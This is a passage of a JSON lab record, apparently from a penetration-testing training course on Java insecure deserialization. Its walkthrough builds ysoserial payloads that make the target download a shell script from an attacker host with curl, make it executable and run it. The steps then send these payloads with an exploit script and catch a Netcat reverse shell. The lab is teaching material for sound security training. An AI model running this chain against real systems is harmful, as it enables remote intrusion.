In the same directory as the file, execute the command below.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python -m SimpleHTTPServer 8888</code></pre>\n<img alt=\"5\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/5.png\" /></p>\n<p><strong>Step 8:</strong> Generate a payload with <strong>ysoserial</strong> that makes the target machine download the shell.sh file from the attacker machine.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"curl http://192.24.161.2:8888/shell.sh -o /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"6\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/6.png\" /></p>\n<p><strong>Step 9:</strong> Execute the Python exploit code.</p>\n<p><strong>Usage:</strong> python exploit.py &lt;host&gt; &lt;port&gt; &lt;/path/to/payload&gt;</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"7\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/7.png\" /></p>\n<p>The output from the Python server shows that the shell.sh file was downloaded by the target machine, so the payload is working as expected.</p>\n<p><img alt=\"8\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/8.png\" /></p>\n<p>We have to run the Python exploit two more times to execute the bash script on the target machine.</p>\n<p><strong>Step 10:</strong> Generate a payload again, this time to make the downloaded shell.sh file executable.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"chmod +x /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"9\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/9.png\" 
/></p>\n<p><strong>Step 11:</strong> Execute the Python code again to send the payload that makes the shell.sh file executable.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"10\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/10.png\" /></p>\n<p><strong>Step 12:</strong> Generate a payload again, this time to execute the downloaded shell.sh file.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"/bin/bash /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"11\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/11.png\" /></p>\n<p><strong>Step 13:</strong> Execute the Python code again to send the payload that executes the shell.sh file on the target machine.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"12\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/12.png\" /></p>\n<p><strong>Step 14:</strong> Open the terminal where Netcat is listening. The shell should arrive on the Netcat listener.</p>\n<p>Check the user id with the following command.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>id</code></pre></p>\n<p><img alt=\"13\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/13.png\" /></p>\n<p>Successfully achieved remote code execution.</p>",
    "flags": [],
    "min_points_to_pass": null,
    "access_type": "default",
    "user_status": "unstarted",
    "user_lab_status": null,
    "user_status_modified": null,
    "user_flags": [],
    "global_running_session": null
}